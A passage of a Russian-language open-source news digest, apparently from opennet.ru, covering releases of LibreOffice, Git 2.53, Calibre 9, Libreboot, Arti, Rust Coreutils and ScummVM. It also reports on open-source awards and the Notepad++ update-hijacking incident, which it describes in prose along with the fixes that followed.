• На платформах Windows и macOS вместо GDI и Aqua для отрисовки задействована библиотека Skia, применяемая в Google Chrome, Firefox, ChromeOS, Android и Flutter, и поддерживающая отрисовку с использованием GPU.
• Изменения в Writer:
  • Добавлены режимы выравнивания абзаца по началу или концу, позволяющие выравнивать абзацы в соответствии с направлением текста (слева направо или справа налево).
  • Обеспечена более заметная отрисовка сетки. В функции "Snap to Grid" реализовано более точное выравнивание объектов по сетке.
    
    
  • Добавлена опция для запрета перетаскивания выделенного текста в режиме Drag&Drop ("Tools ▸ Options ▸ LibreOffice ▸ Writer ▸ Formatting Aids: Drag 'n Drop").
  • Улучшено отображение плавающих таблиц вместе с абзацами с атрибутами, запрещающими разделение на страницы или предписывающими вывод на одной странице со следующим абзацем.
  • При отслеживании изменений улучшено сохранение информации о старом форматировании текста для ODT и DOCX. Улучшено отслеживание частично удалённых абзацев.
  • При вставке изображения из буфера обмена обеспечено автоматическое добавление подписи под изображением при включении режима "AutoCaption".
• Изменения в табличном процессоре Calc:
  • Добавлена поддержка соединительных линий (коннекторов),
  • Добавлена поддержка объекта xmlMaps.
  • Расширены возможности диалога сортировки. В режиме естественной сортировки (natural) появилась опция для обработки символа, отделяющего целую часть числа от дробной, как обычного символа, что, например, позволяет сортировать IP‑адреса в системах с локалями, использующими точку в качестве разделителя. Обеспечено сохранение и восстановление настроек локали, выставленных в диалоге сортировки. Выставление локали влияет не только на выбор алгоритма сортировки, но и на зависящие от локали свойства сортировки, такие как выбор символа разделителя.
  • Добавлена поддержка формата буфера обмена Biff12 (Excel 2007+), позволяющего переносить данные из Excel в Calc.
  • При сохранении в формате XLSX по умолчанию задействован формат из Excel 2010+.
  • Исключено наложение заголовков столбцов при столбцах небольшой ширины.
  • Повышена производительность прокрутки в электронных таблицах с большим числом скрытых столбцов. Ускорена работа с таблицами с большим числом фигур (shape). Ускорено удаление дубликатов. Оптимизирован экспорт в формате SVG с большим числом битмапов.
  • Добавлена функциональность для автоматического отражения данных в форматах XML и JSON, имеющих связываемые диапазоны значений (табличные данные), в листы Calc.
• В системе создания презентаций Impress при запуске в Windows реализована поддержка API Microsoft Media Foundation для воспроизведения звука и видео. Для управления воспроизведением задействован MFPlay.
• В Base реализована поддержка многопользовательского режима.
• В Chart ускорена отрисвока 3D-диаграмм и частично обеспечена возможность корректного тройного преобразования стилей диаграмм (OOXML → LO → OOXML). При наведении указателя мыши на элементы палитры цветов в боковой панели, реализован предпросмотр изменения цвета на лету в активной диаграмме.
• В настройки экспорта PDF добавлены опции с вариантами действий с внешними ссылками.
• Система скриптов обновлена до Python 3.12. В состав включены python-библиотеки для sqlite3, dbm, venv и lzma.

Грегу Кроа-Хартману присуждена премия за вклад в открытое ПО

Премию вручил Дэниел Cтенберг (Daniel Stenberg), президент Европейской академии открытого ПО, автор утилиты curl и участник рабочих групп IETF, развивающих протоколы HTTP и QUIC.

Помимо главной премии учреждены 4 специальные награды (Special Recognitions), присуждённые 5 участникам:

• "Бизнес и влияние" (Business and Impact) - Фрэнк Карличек (Frank Karlitschek), создатель облачной платформы NextCloud.
• "Влияние на сообщество" (Community Impact) - Роберто Ди Космо (Roberto Di Cosmo), итальянский учёный в области компьютерных наук, создатель архива исходного кода Software Heritage.
• "Влияние на сообщество" (Community Impact) - Стефано Закироли (Stefano Zacchiroli), французский исследователь и профессор, три раза занимавший пост лидера проекта Debian и входивший в совет директоров Open Source Initiative (OSI).
• "Навыки и обучение" (Skills and Education) - Мэтью Венн (Matthew Venn), основатель проекта TinyTapeout, помогающего в изготовлении открытых чипов.
• Отстаивание интересов и доступность информации (Advocacy and Awareness) - Дженни Моллой (Jenny Molloy), руководитель группы в Международном центре генетической инженерии и биотехнологии (ICGEB), основатель проекта по открытому обмену биоматериалами Reagent Collaboration Network, соавтор соглашения Open Material Transfer Agreement, одна из учредителей организации Open Science Hardware Foundation, популяризатор открытой науки.

Европейская академия открытого ПО создана при поддержке Европейской комиссии для популяризации и признания выдающихся людей и организаций, занимающихся продвижением открытого программного и аппаратного обеспечения в Европе. Целью является продвижение преимуществ открытых проектов, налаживание сотрудничества и отстаивание общественной и экономической ценности открытых программных и аппаратных технологий. Организация находится на стадии преобразования в независимый некоммерческий фонд, зарегистрированный в Бельгии.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64736

Google переименовал ZetaSQL в GoogleSQL

В качестве причины переименования называется унификация под единым брендом названия развиваемого в Google диалекта SQL и связанных с ним библиотек для разбора и парсинга. Предполагается, что переименование ZetaSQL в GoogleSQL уменьшит путаницу и упростит поиск материалов, связанных с технологией GoogleSQL. Репозиторий с открытым кодом ZetaSQL продолжит развиваться той же командой, но под именем GoogleSQL.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64735

Релиз системы управления коллекцией электронных книг Calibre 9

В новой версии:

• Предложен новый интерфейс для навигации по коллекции книг, стилизованный под книжный шкаф, в котором книги расставлены по полкам. Возможна группировка произведений по авторам и сериям. При наведении курсора на корешок книги на полке выводится подсказка с изображением обложки. Толщина корешка вычисляется в зависимости от числа страниц в книге. Оформление книжной полки может быть изменено в настройках.
• Интегрирована возможность обсуждения книг с AI-ассистентом. Можно задавать вопросы по выбранной книге и запрашивать рекомендации о существовании похожих книг. По умолчанию AI отключён и требует активации в настройках, в которых можно выбрать предпочитаемого облачного AI-провайдера или использовать локально устанавливаемые модели.
• Добавлена поддержка обращения к AI-ассистенту в процессе чтения книги, например, для пояснения непонятных слов, резюмирования или перевода выделенного содержимого, получения ответов на произвольные вопросы о какой-то части текста.

Выпуск загрузочных прошивок Libreboot 26.01 и Canoeboot 26.01

Libreboot нацелен на формирование системного окружения, позволяющего обойтись без проприетарного ПО настолько, насколько это возможно, не только на уровне операционной системы, но и прошивки, обеспечивающей загрузку. Libreboot дополняет Coreboot средствами для упрощения применения конечными пользователями, формируя готовый дистрибутив, которым может воспользоваться любой пользователь, не имеющий специальных навыков.

По сравнению с прошлым стабильным релизом добавлена поддержка ПК и ноутбуков HP Pro 3500, Topton XE2 N150, ThinkPad T580 и Dell Latitude E7240. Ведётся работа над поддержкой устройств Google Chromebook через интеграцию coreboot-дистрибутива MrChromebox. CoreBoot синхронизирован с репозиторием по состоянию на середину января. С актуальными кодовыми базами синхронизированы компоненты GRUB 2.14, U-Boot, SeaBIOS и flashprog.

Оборудование, поддерживаемое в Libreboot:

• Серверные материнские платы:
  • ASUS KFSN4-DRE
  • ASUS KGPE-D16
• Десктоп-системы:
  • Gigabyte GA-G41M-ES2L;
  • Acer G43T-AM3, Q45T-AM;
  • Intel D510MO / D410PT;
  • Apple iMac 5,2;
  • HP Elite 8200 SFF/MT;
  • HP Elite 8300 USDT;
  • HP Pro 3500;
  • Topton XE2 N150;
  • ASUS KCMA-D8;
  • Dell Precision T1650, T1700 SFF/MT;
  • Intel D945GCLF
  • Dell OptiPlex 3050 Micro, 7010, 7020, 9010 и 9020 серии SFF, XE2 SFF, MT и XE2 MT, 780 USFF/MT ;
• Ноутбуки:
  • ThinkPad X60 / X60S / X60 Tablet;
  • ThinkPad T60;
  • Lenovo ThinkPad X200 / X200S / X200 / X220 / X230 / X230 eDP / X230 Tablet;
  • Lenovo ThinkPad X301;
  • Lenovo ThinkPad R400;
  • Lenovo ThinkPad T400 / T400S / T420 / T420S / T430 / T440 / T480 / T480S.
  • Lenovo ThinkPad T500 / T530 / T580;
  • Lenovo ThinkPad W530 / W541;
  • Lenovo ThinkPad R500;
  • HP EliteBook 2560p / 2570p / 2170p / 8470p / Folio 9470m;
  • HP EliteBook 820 G2;
  • HP Compaq Elite 8300 CMT;
  • HP EliteBook 8460p;
  • HP EliteBook 8560w;
  • Dell Latitute E6400 / E6430;
  • Dell Latitude E5420 / E5520 / E5530 / E6520 / E6530 / E6420 / E6220 / E6320 / E6330 / E6230 / E4300 / E7240;
  • Apple MacBook1 и MacBook2;
  • ASUS Chromebook Flip C101 (ARM);
  • Samsung Chromebook Plus (ARM).
• Игровые приставки:
  • Sony PlayStation 1.

Также сформирован выпуск проекта Canoeboot 26.01, который позиционируется как полностью свободная сборка Libreboot, соответствующая требованиям Фонда СПО к свободным дистрибутивам. Выпуск Canoeboot основан на версии Libreboot 26.01, из которой удалены компоненты и изменения, не соответствующие критериям Фонда СПО. В новой версии Canoeboot реализована поддержка серии ПК HP Pro 3500 и ноутбука Dell Latitude E7240.

Необходимость в создании отдельной сборки Libreboot объясняется тем, что сформированные Фондом СПО требования к свободным дистрибутивам не допускают поставку бинарных прошивок (firmware) и любых бинарных компонентов драйверов. При этом начиная с 2022 года проект Libreboot перешёл на более прагматичные правила использования бинарных компонентов, позволившие заметно расширить спектр поддерживаемого аппаратного обеспечения. Новой целью проекта Libreboot стала поддержка всего оборудования, поддерживаемого в coreboot, за исключением бинарных компонентов, влияющих на безопасность и надёжность (например, в Libreboot используется me_cleaner для отключения Intel ME). При таком подходе Libreboot потерял статус полностью свободного дистрибутива с позиции Фонда Свободного ПО.

Устройства, поддерживаемые в Canoeboot:

• Игровые консоли:
  • Sony Playstation (PS1/PSX)
• Серверные материнские платы:
  • ASUS KFSN4-DRE motherboard
  • ASUS KGPE-D16 motherboard
• Десктоп-системы:
  • Acer G43T-AM3
  • Apple iMac 5,2
  • ASUS KCMA-D8
  • Gigabyte GA-G41M-ES2L
  • Intel D510MO and D410PT motherboards
  • Intel D945GCLF
  • Dell Precision T1650
  • Dell OptiPlex 780, 7010 SFF, 9020 SFF и 9020 MT
  • HP Elite 8200 SFF, 8300 CMT, 8300 USDT и Pro 3500
• Ноутбуки (x86):
  • Apple MacBook1,1 и MacBook2,1
  • Dell Latitude E4300, E6400, E6400 XFR, E6400 ATG, E5420, E5520, E5530, E6220, E6230, E6320, E6330, E6420, E6430, E6520 и E6530
  • Lenovo ThinkPad R500, T400, T400S, T500, W500, X200, X200S, X200 Tablet, T60, X60, X60S, X60 Tablet (Intel GPU), T420, T420s, T430, T440p, T520, T530, W530, W541, X220, X230 и X230T
  • Dell Latitude E7240
• Ноутбуки (ARM):
  • ASUS Chromebook Flip C101
  • Samsung Chromebook Plus (v1)
• Эмуляторы:
  • QEMU x86 и arm64

Выпуск Arti 2.0.0, официальной реализации Tor на языке Rust

Arti изначально развивается в форме модульной встраиваемой библиотеки, которую могут использовать различные приложения. При проектировании Arti учтён прошлый опыт разработки Tor, что позволило избежать известных архитектурных проблем, связанных с тем, что реализация на Си вначале была спроектирована как SOCKS-прокси, а уже потом подогнана под другие потребности.

Кроме модернизации архитектуры, причиной переписывания Tor на Rust стало желание повысить защищённость кода за счёт использования языка, обеспечивающего безопасную работу с памятью. По оценке разработчиков Tor, использование языка Rust без блоков "unsafe", позволит не допустить появления как минимум половины от всех типичных уязвимостей в проекте. Кроме того, предполагается, что Rust повысит скорость разработки благодаря выразительности языка и строгих гарантий, позволяющих не тратить время на двойные проверки и написание лишнего кода.

Значительное изменение номера версии связано с внесением изменений, нарушающих обратную совместимость, в соответствии с применяемой проектом моделью семантического версионирования. Прекращена поддержка настроек proxy.socks_port и proxy.dns_port, ранее объявленных устаревшими, на смену которым пришли настройки proxy.socks_listen и proxy.dns_listen. Также прекращена поддержка старого синтаксиса определения серверов директорий (Directory Authority) и помечены экспериментальными все программные интерфейсы crate-пакета arti, которые планируют переместить в другие crate-пакеты или удалить.

Из новой функциональности отмечается поддержка нового типа сокетов "inet-auto" для автоматического назначения неиспользуемого TCP-порта для RPC-сервера. Продолжена реализация функциональности для релеев и серверов директорий. Для серверов директорий проведена работа по управлению сертификатами, добавлена возможность загрузки, верификации и хранения сертификатов. Для релеев представлена новая модульная архитектура управления цепочками узлов, добавлена поддержка создания каналов связи с другими релеями, поддержка обработки запросов согласования соединений и возможность работы релея в роли сервера при установке TLS-соединения.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64732

Выпуск системы управления исходными текстами Git 2.53

По сравнению с прошлым выпуском в новую версию принято 466 изменений, подготовленных при участии 70 разработчиков (21 впервые приняли участие в разработке Git). Основные новшества:

• Добавлена возможность применения стратегии упаковки репозиториев "geometric" ("git repack --geometric") к частично клонированным внешним репозиториям, работающим в режиме "promisor" (недостающие объекты догружаются при необходимости). При переупаковке с опций "--geometric" pack-файлы с расширением ".promisor" обрабатываются и упаковываются отдельно. Стратегия "geometric" позволяет сократить время обслуживания крупных монорепозиториев, за счёт выборочной переупаковки объектов и исключения излишних ресурсоёмких операций, таких как слияние всех pack-файлов (сохраняется геометрическая прогрессия размера pack-файлов, при которой каждый следующий pack-файл должен быть как минимум в два раза больше предыдущего).
• В команду "git fast-import" добавлена опция "--signed-commits=strip-if-invalid" для удаления цифровых подписей из импортируемых объектов, ставших некорректными после перезаписи части истории репозитория. До этого можно было либо импортировать, либо удалить все подписи, без разделения на действительные и потерявшие смысл. Опция "strip-if-invalid" позволяет реализовать инструменты для сохранения действующих подписей и переподписывания объектов с потерявшими актуальность подписями.
• В вывод команды "git repo structure" добавлена информация о размере всех достижимых объектов (reachable) в репозитории с разбивкой по их типам. Информация теперь выводится в читаемом виде с единицами измерения и показывается отдельно для фактического и занимаемого на диске размеров, что позволяет оценить общий размер репозитория на диске.

     $ git repo structure
  
     | Repository structure | Value      |
     | -------------------- | ---------- |
     | * References         |            |
     |   * Count            |   1.78 k   |
     |     * Branches       |      5     |
     |     * Tags           |   1.03 k   |
     |     * Remotes        |    749     |
     |     * Others         |      0     |
     |                      |            |
     | * Reachable objects  |            |
     |   * Count            | 421.37 k   |
     |     * Commits        |  88.03 k   |
     |     * Trees          | 169.95 k   |
     |     * Blobs          | 162.40 k   |
     |     * Tags           |    994     |
     |   * Inflated size    |   7.61 GiB |
     |     * Commits        |  60.95 MiB |
     |     * Trees          |   2.44 GiB |
     |     * Blobs          |   5.11 GiB |
     |     * Tags           | 731.73 KiB |
     |   * Disk size        | 301.50 MiB |
     |     * Commits        |  33.57 MiB |
     |     * Trees          |  77.92 MiB |
     |     * Blobs          | 189.44 MiB |
     |     * Tags           | 578.13 KiB |
  

• В команду "git maintenance" добавлена подкоманда "is-needed" для выполнения операций обслуживания репозитория только при наличии в этом необходимости.
• В экспериментальной команде "git replay" по умолчанию реализовано обновление ссылок в транзакции, вместо показа, куда должны указывать ссылки, без обновления.
• В команду "git blame" добавлена возможность выбора алгоритма оценки отличий при помощи опции "--diff-algorithm=‹algo›".
• В команду "git repo info" добавлена опция "--all".
• Из Git-for-Windows перенесена поддержка символических ссылок для платформы Windows.

В состав прошлого выпуска было добавлено предупреждение о включении по умолчанию сборки компонентов на языке Rust в Git 2.53. Тем не менее, фактически в версии Git 2.53 лишь добавлены отдельные улучшения поддержки Rust (возможность сборки без GNU sed), но сборка с Rust при использовании Makefile оставлена по умолчанию отключённой (требует выставления флага WITH_RUST), а при использовании Meson автоматически активируется при наличии компилятора rustc. В версии Git 3.0 инструментарий Rust намерены включить в число обязательных сборочных зависимостей.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64731

Выпуск Rust Coreutils 0.6.0, повысивший совместимость с GNU Coreutils с 87% до 96%

Rust Coreutils задействован по умолчанию в выпуске Ubuntu 25.10 и применяется в дистрибутивах AerynOS (Serpent OS) и Apertis (развивается компанией Collabora). В отличие от GNU Coreutils реализация на Rust распространяется под пермиссивной лицензией MIT, вместо копилефт-лицензии GPL. Дополнительно той же командой разработчиков развиваются написанные на Rust аналоги наборов утилит util-linux, diffutils, findutils, procps и acl, а также программ sed и login.

В новой версии Rust Coreutils:

• Достигнут уровень совместимости с эталонным тестовым набором GNU Coreutils - 96.28% (было 87.75%). Успешно выполнено 622 тестов, что на 56 больше, чем в прошлой версии (566). 16 (было 55) тестов завершилось неудачей, а 7 (было 23) тестов было пропущено. Наиболее значительное повышение совместимости отмечено для утилит sort, ls, date, cksum и tail.
• Из date, sort, locale.rs и других утилит удалён код, в котором использовалось ключевое слово "unsafe".
• Обращения к стандартной библиотеке libc заменены на эквивалентные защищённые вызовы, предоставляемые пакетом nix.
• Улучшена обработка ошибок, исключены аварийные завершения при записи в /dev/full.
• В утилите date реализована локализация названий месяцев и дней, учитывающая ICU. Обеспечено форматирование часов и календаря с учётом локали.
• В утилите sort обеспечена сортировка чисел c разделителями тысяч и реализована обработка параметров +POS/-POS.
• В утилиту join добавлена поддержка свойств локали "collation", позволяющих выполнять сопоставления с учётом смысла символов (например, при сравнении может не приниматься во внимание знак ударения).
• Проведена оптимизация производительности утилит base32, base64, basenc и df.
• В утилите uniq снижено потребление памяти при работе без учёта регистра.
• В утилите shuf оптимизирован числовой вывод и добавлена опция "--random-seed".
• В tsort исключена загрузка всех входных данных в память.
• В утилиту tail добавлен флаг "--debug".
• В утилите chmod решены проблемы с рекурсивным выполнением операций и добавлена опция "--preserve-root".
• На Unix-подобных системах усилена безопасность при обходе содержимого каталогов.
• В утилиты ls, id, mkdir, mkfifo и mknod добавлена поддержка механизма мандатного контроля доступа SMACK.
• В систему непрерывной интеграции добавлена проверка сборки на 64-разрядных системах RISC-V с библиотекой musl.
• Улучшена работа в Windows c использованием Cygwin.
• Расширены возможности, устранены проблемы и добавлены недостающие опции для утилит arch, base64, basename, cat, chgrp, chmod, chroot, cksum, comm, cp, csplit, date, dd, df, dir, dirname, du, echo, env, expand, expr, fmt, fold, groups, hashsum, head, hostid, id, install, join, kill, ln, logname, ls, mkdir, mkfifo, mknod, mktemp, more, mv, nice, nl, nohup, nproc, numfmt, pr, printenv, printf, ptx, readlink, rm, rmdir, runcon, seq, shred, shuf, sort, split, stat, stdbuf, stty, sync, tac, tail, tee, test, timeout, touch, truncate, tsort, uname, unexpand, uniq, uptime, users, wc, yes, ucore, uucore, uudoc.

Проект Linux From Scratch прекращает поддержку SysVinit в пользу systemd

В Linux From Scratch приведены инструкции по созданию с нуля базовой Linux-системы, используя лишь исходные тексты необходимого программного обеспечения. Beyond Linux From Scratch дополняет инструкции LFS информацией о сборке и настройке прикладных программных пакетов, охватывающих различные области применения, от СУБД и серверных систем, до графических оболочек и медиапроигрывателей.

В качестве причин отказа от развития руководств с SysVinit упоминается нехватка ресурсов и прекращение поддержки SysVinit крупными проектами, такими как GNOME и KDE Plasma. Проект поддерживается небольшой командой добровольцев, которая не справляется с обработкой потока изменений в 88 пакетах LFS и более 1000 пакетов в BLFS, в условиях необходимости проверки всех пакетов на работоспособность в окружениях на базе System V и systemd. Помимо этого последние версии GNOME и KDE Plasma требуют для работы функциональности systemd, которую можно было бы реализовать перейдя на OpenRC, но миграция не решит проблему с перегруженностью редакторов книги.

Брюс также отметил, что это вынужденное решение, которым он не доволен. Systemd включает 1678 файлов на языке C плюс множество файлов с данными, в то время как SysVinit содержит 22 файла на языке C и около 50 небольших bash-скриптов и файлов с данными. Несмотря на значительный перевес systemd в функциональности, по мнению Брюса, после прекращения поддержки SysVinit книга потеряет составляющие, важные для понимания того, как работает система.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64728

Набор подсказок для рецензирования изменений в ядре Linux и systemd при помощи AI

Также предоставляются шаблоны и списки проверок для выявления и классификации типовых ошибок (примеры для dbus и сетевой подсистемы) и инструкции по формированию через AI автоматизированных отчётов. После рецензирования патчей на выходе формируется файл review-inline.txt, оформленный в виде заготовки email для отправки в список рассылки разработчиков ядра.

Отмечается, что многие ложные срабатывания при анализе изменений через AI вызваны непониманием специфики кодовой базы и опубликованные подсказки нацелены на предоставление AI необходимой информации для принятия верных решений. В настоящее время уровень ложных срабатываний при использовании предложенного набора составляет примерно 10%.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64709

В Debian GNU/Hurd обеспечена сборка 75% пакетов Debian

• В дистрибутиве Debian GNU/Hurd обеспечена возможность сборки 75% пакетов из архива Debian (в 2023 году данный показатель составлял 58%).
• Стабилизирован порт для архитектуры x86_64, обеспечено формирование пакетов Debian для систем x86_64, началось портирование на системы ARM64.
• Добавлена начальная поддержка SMP (Symmetric multiprocessing).
• Улучшена поддержка драйверов в пространстве пользователя через задействование развиваемого проектом NetBSD механизма rump (Runnable Userspace Meta Program).
• Подготовлены работающие в пространстве пользователя драйверы для дисков SATA/USB и сетевых адаптеров.
• Реализованы работающие в пространстве пользователя стеки USB и TCP/IP.
• Обеспечена сборка в Debian GNU/Hurd пакетов с Xfce, GNOME, KDE, llvm.
• Добавлена поддержи языков go, rust, ocaml, ghc, java.
• Создан дистрибутив Guix/Hurd с возможностью использования ядра GNU Hurd (x86_64-gnu) вместо ядра Linux.
• Стартовали проекты по созданию вариантов дистрибутивов Arch и Alpine с ядром GNU Hurd.

GNU Hurd представляет собой ядро, развиваемое в качестве замены ядра Unix и оформленное в виде набора серверов, работающих поверх микроядра GNU Mach и реализующих различные системные сервисы, такие как файловые системы, сетевой стек, система управления доступом к файлам. Микроядро GNU Mach предоставляет IPC-механизм, используемый для организации взаимодействия компонентов GNU Hurd и построения распределённой мультисерверной архитектуры. Дистрибутив Debian GNU/Hurd сочетает программное окружение Debian c ядром GNU/Hurd и остаётся единственной активно развиваемой платформой Debian, созданной на базе ядра, отличного от Linux (ранее развивался порт Debian GNU/KFreeBSD, но он давно находится в заброшенном состоянии).

Источник: https://www.opennet.ru/opennews/art.shtml?num=64727

Первый публичный релиз ANet, стека для создания защищённых туннелей

Основные особенности:

• Криптография: ChaCha20Poly1305 для потока, X25519 для Ephemeral DH, Ed25519 для аутентификации. Никаких legacy-алгоритмов и «костылей для совместимости с Windows XP».
• Транспорт: QUIC-подобный обвес поверх UDP, но с собственным фреймингом: каждый пакет оборачивается в шифрованный "envelope" со случайным добавочным заполнением и jitter-ом (от 0 до N наносекунд), что маскирует процесс согласования соединения под белый шум.
• Распределённая Архитектура: Сервер авторизации (anet-auth) проверяет fingerprint-клиента (SHA256 от открытого ключа на базе Ed25519), но сам туннель поднимается по PSK (pre-shared key), полученным через 4-фазный handshake (DH + double ratchet). Если auth-сервер падает — сеть продолжает работать на заранее загруженных ключах (failover до полного локального режима).
• Поддерживаемые платформы: Linux (TUN), Windows (Wintun), macOS (utun), Android (VpnService через JNI). Есть и GUI на egui (Rust-native), и TUI для headless-серверов.

В отличии от WireGuard и OpenVPN, которые имеют узнаваемый handshake (Magic number + Noise Protocol) и характерный TLS-отпечаток, в протоколе ASTP каждый пакет начинается со случайной затравки (nonce 12 байт), за которым идёт шифротекст переменной длины с добавочным заполнением до ближайшего размера блока (настраивается). Для внешнего наблюдателя трафик неотличим от случайного. ANet преподносится как попытка вернуть в VPN "физичность" эпохи флоппинет (HDD у друга), но в цифре: PSK (pre-shared keys), ручное управление маршрутами, "zero-knowledge proof" через fingerprint.

Проект сопровождается кодексом поведения (Code of Conduct), подготовленным в соответствии с принципом "радикальной честности". В правилах прописано "Право на Посыл" (право послать любого разработчика при плохом коде), "Зеркальный Ответ" (жалобы на токсичность игнорируются), первостепенность кода (неважно, кто автор, а важно качество кода) и бан за попытки навязывания политкорректности.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64726

Атака на проект Notepad++, приведшая к выборочной подмене обновлений

Атака была проведена через выборочное перенаправление трафика между пользователем и сервером загрузки обновлений. Подмена оказалась возможной из-за уязвимости в механизме верификации и проверки целостности загружаемого обновления. Атакующий, способный вклиниться в транзитный трафик, мог подменить манифест обновления и инициировать вывод запроса на загрузку своего фиктивного обновления и связанных с ним метаданных для проверки целостности.

Дополнительный разбор показал, что атака была реализована на уровне инфраструктуры хостинг-провайдера, что позволило злоумышленникам перехватывать и перенаправлять трафик, адресованный домену notepad-plus-plus.org. Перенаправление осуществлялось выборочно только для определённых пользователей, которым отдавался подменённый манифест с информацией об обновлениях. Первые следы активности атакующих датированы июнем 2025 года, а последние - 10 ноября, но возможность совершения атаки сохранялась до 2 декабря.

Судя по предоставленной провайдером информации, атака стала возможна благодаря взлому одного из серверов для совместного хостинга. 2 сентября лазейка была прикрыта, но атакующие до этого получили учётные данные для подключения к одному из внутренних сервисов, что позволяло им до 2 декабря перенаправлять трафик Notepad++ на свои серверы. 2 декабря подмена обновлений была замечена и провайдер блокировал доступ атакующих. После инцидента сайт Notepad++ был переведён к другому хостинг-провайдеру, более тщательно заботящемуся о безопасности.

В версии Notepad++ 8.8.9 для блокирования подмены обновлений в состав Notepad++ и WinGUp были добавлены обязательные проверки не только цифровых подписей, но и сертификатов для загружаемых файлов, а тауже реализована блокировка применения обновления при неудачной проверке. В ожидаемом в течение месяца выпуске 8.9.2 дополнительно будет добавлена проверка цифровой подписи для XML-манифеста (XMLDSig), возвращаемого сервером доставки обновлений.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64725

В Firefox появилась настройка для отключения AI и активирован режим разделения экрана

Для выборочного отключения доступны такие возможности, завязанные на AI, как перевод на другой язык, распознание текста на изображениях и в отсканированных PDF-документах, рекомендации и метки при группировке вкладок, генерация краткого содержимого страницы при предпросмотре ссылок и интерфейс для обращения к чатботам. Каждая из функций может быть включена, деактивирована или блокирована. При блокировке локально устанавливаемые AI-модели удаляются, а элементы интерфейса скрываются.

Дополнительно отмечается включение по умолчанию в ночных сборках Firefox, на основе которых 24 марта будет опубликован Firefox 149, режима Split View. В данном режиме пользователь может бок о бок в одном окне просмотреть содержимое двух вкладок. В Firefox 147 режим Split View по умолчанию отключён и активируется через параметр "browser.tabs.splitView.enabled" на странице about:config, после чего в контекстном меню, показываемом при клике правой кнопкой мыши на вкладках, появится кнопка "Add Split View".

При нажатии данной кнопки содержимое окна разделяется на две части и в правой части открывается содержимое страницы новой вкладки. Если выбрать опцию для группы из двух вкладок, указанные вкладки сразу будут раскрыты рядом с друг другом. Допускается произвольное изменение размера правой и левой области просмотра через перетаскивание мышью полосы-разделителя. Активная вкладка при одновременном просмотре выделяется красной рамкой.

Из изменений в ночных сборках Firefox также отмечается задействование в отдельном поле для поиска, которое можно добавить на панель, тех же механизмов вывода выпадающей информации, что используются в адресной строке AwesomeBar. Кроме того, началось тестирование функции Tab Notes, позволяющей прикреплять произвольные примечания к вкладкам.

Выпуск свободного эмулятора классических квестов ScummVM 2026.1.0

Всего обеспечена возможность запуска более 500 квестов, включая игры компаний LucasArts, Humongous Entertainment, Revolution Software, Cyan и Sierra, такие как Maniac Mansion, Monkey Island, Broken Sword, Myst, Blade Runner, King's Quest 1-7, Space Quest 1-6, Discworld, Simon the Sorcerer, Beneath A Steel Sky, Lure of the Temptress и The Legend of Kyrandia. Поддерживается запуск игр на платформах Linux, Windows, macOS, iOS, Android, PS Vita, Switch, Dreamcast, AmigaOS, Atari/FreeMiNT, RISC OS, Haiku, PSP, PS3, Maemo, GCW Zero и др.

В новой версии:

• Добавлена поддержка 12 игровых движков и основанных на них 194 игр:
  • Adibou 2: Nature & Sciences.
  • Dark Seed.
  • Dog-n-cat: In the Footsteps of Unprecedented Beasts.
  • Dog-n-cat: Island of Dr Ratiarty.
  • Features of National Fishing.
  • God of Thunder.
  • Heart of China.
  • Hodj 'n' Podj.
  • Little Longnose.
  • Mom Don't Worry.
  • Mort&Phil: A Movie Adventure (Special Edition).
  • Nancy Drew: Ghost Dogs of Moon Lake.
  • Nancy Drew: Secret of the Scarlet Hand.
  • Out of this World (Another World).
  • Penumbra: Overture.
  • Pilot Brothers 3: Back Side of the Earth.
  • Pilot Brothers 3D-2. Kennel Club Secrets.
  • Pilot Brothers 3D. The Case of Garden Pests.
  • Ripley's Believe It or Not!: The Riddle of Master Lu.
  • Tex Murphy: Martian Memorandum
  • The Adventures of Willy Beamish.
  • Trick or Treat.
  • Более 160 игр на движке WAGE.
  • 12 игр на движке SLUDGE, серди которых Out of Order, The Secret of Tremendous Corporation и Robin's Rescue.
• Добавлена поддержка платформы Android 16. Для Android также реализована возможность сглаживания вывода для 3D-движков и использования штатных сетевых функций вместо libcurl.
• Реализована возможность сборки с библиотекой SDL3 (по умолчанию продолжает использоваться SDL2).
• Появилась возможность масштабирования результата работы шейдеров 3D-движков.
• Во движки Access, Buried, Drascula, EFH, Hypno, Lab, Neverhood, NGI, Petka, Pink, Prince, Private, Queen, Sherlock, Supernova, Sword25, Teenagent, Tetraedge Titanic, Toltecs и Voyeur добавлена возможность переопределения клавиш, а также кнопок мыши и джойстика.
• В движки ADL, AGI, CinE, Cruise, Draci, Drascula, EFH, Gob, Hugo, MADE, MM, Parallaction, Prince и Wintermute добавлена поддержка синтеза речи.
• В движке Private Eye значительно обновлена звуковая подсистема и добавлена поддержка внешних субтитров.
• Значительно переработан движок SCUMM, в котором появилась поддержка оригинального внутриигрового графического интерфейса для DOS, Macintosh и Windows.
• В движке Stark улучшена совместимость с графическими картами.
• Изменена нумерация версий, вместо формата "X.Y.Z" применена схема "год.меcяц.обновление".